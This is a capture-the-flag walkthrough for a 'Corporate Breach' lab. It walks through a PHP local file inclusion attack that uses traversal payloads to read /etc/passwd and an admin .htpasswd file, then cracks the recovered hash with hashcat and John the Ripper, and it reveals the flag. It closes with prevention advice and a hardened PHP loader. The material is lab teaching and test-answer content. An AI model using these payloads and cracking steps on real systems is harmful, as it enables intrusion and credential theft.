  • Daily Challenge
  • Released 08 Jul 2025

Corporate Breach - Complete Solution Walkthrough

Step 1: Initial Reconnaissance

  1. Access the corporate website at
  2. Explore the website structure and identify potential vulnerable parameters
  3. Look for any include or file inclusion functionality
  4. Check for common vulnerable parameters like 'page', 'file', 'include', etc.

Step 2: Identifying the Vulnerability

  1. Navigate to the 'About' page and observe the URL structure
  2. Notice the URL contains a parameter like: ?page=about
  3. Test for directory traversal by modifying the parameter
  4. Try accessing: ?page=../../../etc/passwd to test for LFI (note: this will work because the else clause doesn't append .php)
  5. If successful, you'll see system file contents

Step 3: Exploiting the Include Vulnerability

  1. Use the include vulnerability to read the .htaccess file
  2. Navigate to: ?page=admin/.htaccess
  3. This will display the .htaccess file contents
  4. Look for authentication directives and password files
  5. You should see something like:
    AuthType Basic
    AuthName "Admin Area"
    AuthUserFile /var/www/html/admin/.htpasswd
    Require valid-user

Step 4: Reading the Password File

  1. Now read the .htpasswd file using the same vulnerability
  2. Navigate to: ?page=admin/.htpasswd
  3. This will display the password hash
  4. You should see something like:
    admin:$apr1$Ewv3fbgh$0ehlEITBv79FOVqbOtsoc/
  5. Copy the hash for cracking

Step 5: Cracking the Password Hash

  1. Use a password cracking tool like hashcat or John the Ripper
  2. Installing hashcat:
    # Ubuntu/Debian:
    sudo apt-get install hashcat

    # macOS (with Homebrew):
    brew install hashcat

    # Windows:
    # Download from https://hashcat.net/hashcat/
  3. Installing John the Ripper:
    # Ubuntu/Debian:
    sudo apt-get install john

    # macOS (with Homebrew):
    brew install john

    # Windows:
    # Download from https://www.openwall.com/john/
  4. Using hashcat:
    # Create a file with the hash
    # (single quotes stop the shell from expanding $apr1, $Ewv3fbgh and $0...)
    echo 'admin:$apr1$Ewv3fbgh$0ehlEITBv79FOVqbOtsoc/' > hash.txt

    # Use hashcat with Apache MD5 mode (-m 1600)
    # --username tells hashcat to skip the leading "admin:" field
    hashcat -m 1600 -a 0 --username hash.txt /usr/share/wordlists/rockyou.txt

    # Or with a smaller wordlist for testing
    hashcat -m 1600 -a 0 --username hash.txt /usr/share/wordlists/common_passwords.txt
  5. Using John the Ripper:
    # Create a file with the hash
    # (single quotes stop the shell from expanding the $ fields)
    echo 'admin:$apr1$Ewv3fbgh$0ehlEITBv79FOVqbOtsoc/' > hash.txt

    # Use john with wordlist
    john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

    # Or with a smaller wordlist for testing
    john --wordlist=/usr/share/wordlists/common_passwords.txt hash.txt
  6. Alternative: Online hash cracking
    # You can also use online tools like crackstation.net
    # Just paste the hash: $apr1$Ewv3fbgh$0ehlEITBv79FOVqbOtsoc/
  7. Common wordlists to try: rockyou.txt, common_passwords.txt, passwords.txt
  8. For this challenge, the password is a common corporate password
  9. Important: The flag is the password you crack, not something you find in the admin panel!

Step 6: The Flag

  1. Once you successfully crack the password hash, you have the flag!
  2. The flag is the password you cracked: password123
  3. No need to access the admin panel - the password itself is the flag
  4. Submit the password as your flag

Technical Details and Security Implications

  • PHP Include Vulnerabilities: Occur when user input is directly included in file operations without proper validation
  • Directory Traversal: Allows attackers to access files outside the intended directory
  • .htaccess Protection: While useful, can be bypassed if the application has other vulnerabilities
  • Password Hash Cracking: Demonstrates the importance of strong passwords and proper hash storage
  • Defense in Depth: Multiple security layers are needed to protect sensitive areas

Prevention and Best Practices

  • Input Validation: Always validate and sanitize user input
  • Whitelist Approach: Only allow specific files to be included
  • Path Validation: Ensure included files are within allowed directories
  • Strong Authentication: Use strong passwords and consider multi-factor authentication
  • Security Headers: Implement proper security headers and access controls
  • Regular Audits: Conduct regular security assessments
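The whitelist and path-validation items above, combined in one page loader. This is an added example, not the lab's own source code; the pages directory, the page names and the resolve_page() helper are assumptions made for illustration.

```php
<?php
declare(strict_types=1);

// Assumption: page templates live in ./pages beside this script.
const PAGES_DIR = __DIR__ . '/pages';

// Allowlist: the only values ?page= may take, mapped to fixed file names.
// The request value is a lookup key and never becomes part of a path.
const ALLOWED_PAGES = [
    'home'    => 'home.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
];

// Resolve a ?page= value to an absolute template path, or null if rejected.
function resolve_page(string $requested): ?string
{
    // 1. Allowlist check: "../../../etc/passwd" and "admin/.htpasswd"
    //    are not keys in the map, so they are rejected here.
    if (!array_key_exists($requested, ALLOWED_PAGES)) {
        return null;
    }

    // 2. Path validation as a second layer: canonicalise both paths and
    //    confirm the template is still inside PAGES_DIR (covers symlinks).
    $base = realpath(PAGES_DIR);
    $path = realpath(PAGES_DIR . '/' . ALLOWED_PAGES[$requested]);
    if ($base === false || $path === false) {
        return null;
    }
    // The trailing separator keeps a sibling such as "pages_old" from matching.
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// A non-string value (for example ?page[]=x) is rejected instead of cast.
$requested = $_GET['page'] ?? 'home';
$template  = is_string($requested) ? resolve_page($requested) : null;
if ($template === null) {
    http_response_code(404);
    exit('Page not found');
}
include $template;
```

Because the lookup happens before any path is built, the traversal and .htaccess/.htpasswd requests from Steps 2 to 4 return a 404 without touching the filesystem.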

Flag

The flag is: password123

Learning Objectives Achieved

  • Understanding PHP include vulnerabilities and their exploitation
  • Learning about .htaccess authentication bypass techniques
  • Practicing password hash cracking methodologies
  • Developing web application security testing skills
  • Understanding defense in depth and security layers